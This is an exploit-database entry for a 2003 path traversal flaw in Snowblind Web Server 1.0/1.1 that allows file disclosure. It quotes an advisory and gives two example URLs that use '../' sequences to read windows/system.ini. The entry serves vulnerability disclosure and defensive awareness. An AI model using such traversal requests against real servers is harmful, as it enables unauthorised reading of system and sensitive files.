Snowblind 1.0/1.1 - Web Server File Disclosure

EDB-ID:

22609

CVE:

2003-0312

EDB Verified:

Author:

euronymous

Type:

remote

Exploit: /

Platform:

Windows

Date:

2003-05-16

Vulnerable App:

source: https://www.securityfocus.com/bid/7618/info

It has been announced that Snowblind Web Server is vulnerable to a condition that may result in the disclosure of potentially sensitive information.

According to the report, Snowblind Web Server does not perform correct access validation on client requested paths which include "../" character sequences.

http://www.example.com/../../windows/system.ini
http://www.example.com/internal.sws?../../windows/system.ini

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services